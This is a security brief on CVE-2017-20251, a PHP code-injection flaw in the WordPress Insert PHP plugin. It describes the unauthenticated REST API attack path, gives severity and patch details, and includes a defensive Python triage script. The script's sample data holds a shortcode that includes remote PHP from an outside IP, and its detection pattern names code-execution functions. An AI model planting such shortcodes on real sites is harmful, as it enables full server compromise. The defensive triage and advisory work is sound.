Wasteland.
CVE-2017-20251, 2026-06-09

CVE-2017-20251: Unauthenticated PHP Code Injection in WordPress Insert PHP Plugin

"A critical flaw in the WordPress Insert PHP plugin lets unauthenticated attackers execute arbitrary PHP on the server through the WordPress REST API."

What Is It

CVE-2017-20251 is a PHP code injection vulnerability (CWE-94) in the WordPress Insert PHP plugin, affecting versions before 3.3.1. The plugin's purpose is to run the PHP placed between [insert_php] and [/insert_php] shortcode tags in post content, so anyone who can get such a shortcode into a post can run code on the server. Per the advisory data, the injection point is the WordPress REST API: an unauthenticated attacker sends a POST request to the wp-json/wp/v2/posts endpoint whose content carries a crafted insert_php shortcode, and when that shortcode is processed the server includes and executes attacker-supplied PHP, including remote PHP files.

Why It Matters

The vulnerability carries a CVSS 3.1 base score of 9.8 (Critical), vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, and a CVSS 4.0 score of 9.3: reachable over the network, low attack complexity, no privileges, no user interaction, and high impact on confidentiality, integrity, and availability. Because exploitation is unauthenticated and leads directly to remote code execution, a single crafted request can fully compromise a vulnerable host. A public exploit is available on Exploit-DB, which lowers the barrier to attack.

What's Vulnerable

WordPress sites running the Insert PHP plugin at any version before 3.3.1. The vulnerable code path is reachable through the WordPress REST API wp-json/wp/v2/posts endpoint, where insert_php shortcodes in submitted post content are processed and executed. The CVE record carries the unsupported-when-assigned tag, meaning the affected versions were already outside vendor support when the CVE was assigned, so do not expect a vendor advisory beyond the 3.3.1 release.
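To turn the description above into something an administrator can run, here is a small triage script written for this brief; it is an added example, not code from the original page or from the plugin author. It assumes the standard WordPress plugin header format for the Version: line, that the shortcode name is insert_php as stated above, and that post rows are read from the wp_posts table (ID, post_author, post_status, post_content). The plugin header and post rows embedded below are constructed sample inputs, and the "suspicious" marker is a heuristic of this example, not a detection the plugin or the advisory provides.

```python
"""Triage helpers for CVE-2017-20251 (Insert PHP plugin before 3.3.1).

Added example for this brief; not code from the original page or the plugin.
Assumptions (labelled): the plugin's main file uses the standard WordPress
"Version:" header line, the shortcode is [insert_php]...[/insert_php] as the
brief states, and post rows come from wp_posts (ID, post_author, post_status,
post_content). All sample data below is constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

FIXED_VERSION: Tuple[int, ...] = (3, 3, 1)  # first version the brief lists as fixed


def parse_version(text: str) -> Tuple[int, ...]:
    """Normalise '3.3' / '3.3.1' / '3.3.1-rc1' into a three-part integer tuple."""
    parts = [int(p) for p in re.findall(r"\d+", text)]
    return tuple((parts + [0, 0, 0])[:3])


def is_vulnerable_version(version: str) -> bool:
    """True for any version below 3.3.1 (the brief's 'before 3.3.1')."""
    return parse_version(version) < FIXED_VERSION


# Standard WordPress plugin header field, e.g. " * Version: 3.3" or "Version: 3.3".
PLUGIN_VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*(\S+)", re.MULTILINE)


def plugin_version_from_header(php_source: str) -> Optional[str]:
    """Pull the Version: field out of a plugin's main PHP file."""
    m = PLUGIN_VERSION_RE.search(php_source)
    return m.group(1) if m else None


# The plugin's shortcode pair; the body between the tags is what gets run as PHP.
SHORTCODE_RE = re.compile(r"\[insert_php\](.*?)\[/insert_php\]", re.DOTALL | re.IGNORECASE)

# Heuristic only (this example's, not the plugin's): constructs that load or run
# attacker-controlled code, or fetch something remote. A match means "look at it".
SUSPICIOUS_RE = re.compile(
    r"\b(include|include_once|require|require_once|eval|system|exec|shell_exec|"
    r"passthru|base64_decode|file_get_contents|curl_exec)\b|https?://",
    re.IGNORECASE,
)


def find_insert_php(post_content: str) -> List[str]:
    """Return the PHP bodies of every insert_php shortcode in one post."""
    return [body.strip() for body in SHORTCODE_RE.findall(post_content)]


def triage_posts(rows: List[Dict]) -> List[Dict]:
    """Flag every post carrying an insert_php shortcode, with a crude risk mark.

    Work from wp_posts rows (e.g. a SQL export), not from rendered REST output:
    rendering a post is exactly what executes the shortcode.
    """
    findings = []
    for row in rows:
        for body in find_insert_php(row.get("post_content", "")):
            findings.append({
                "ID": row["ID"],
                "post_author": row.get("post_author"),
                "post_status": row.get("post_status"),
                "code": body,
                "suspicious": bool(SUSPICIOUS_RE.search(body)),
            })
    return findings


# --- constructed sample inputs -------------------------------------------------
SAMPLE_PLUGIN_HEADER = """<?php
/*
Plugin Name: Insert PHP
Version: 3.3
*/
"""

SAMPLE_POSTS = [
    {"ID": 12, "post_author": 1, "post_status": "publish",
     "post_content": "Copyright [insert_php] echo date('Y'); [/insert_php]"},
    {"ID": 913, "post_author": 0, "post_status": "draft",
     "post_content": "[insert_php] include('http://203.0.113.5/p.txt'); [/insert_php]"},
    {"ID": 914, "post_author": 1, "post_status": "publish",
     "post_content": "A plain post with no shortcodes."},
]

if __name__ == "__main__":
    ver = plugin_version_from_header(SAMPLE_PLUGIN_HEADER)
    print(f"installed {ver}: vulnerable={is_vulnerable_version(ver)}")
    for f in triage_posts(SAMPLE_POSTS):
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"post {f['ID']} ({f['post_status']}, author {f['post_author']}): {flag}: {f['code']}")
```

Run the version check against the plugin's main file on disk, and feed triage_posts with rows pulled straight from the database rather than from the site's REST API or front end, since fetching rendered content would itself execute any injected shortcode. Every shortcode the site owners did not author, suspicious-marked or not, should be removed from post content.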

Patch Status

The vulnerability is resolved in Insert PHP version 3.3.1. Administrators of affected sites should update to 3.3.1 or later, or remove the plugin if it is no longer maintained or needed. Updating does not touch stored post content, so any insert_php shortcode the site owners did not author should be removed from the affected posts as a separate cleanup step. The NVD record lists this CVE with a vulnerability status of "Deferred", a status NVD applies to older CVEs it is not prioritizing for further enrichment, so do not expect that record to be updated. No CISA KEV entry was supplied, so active exploitation is not confirmed via KEV.

Sources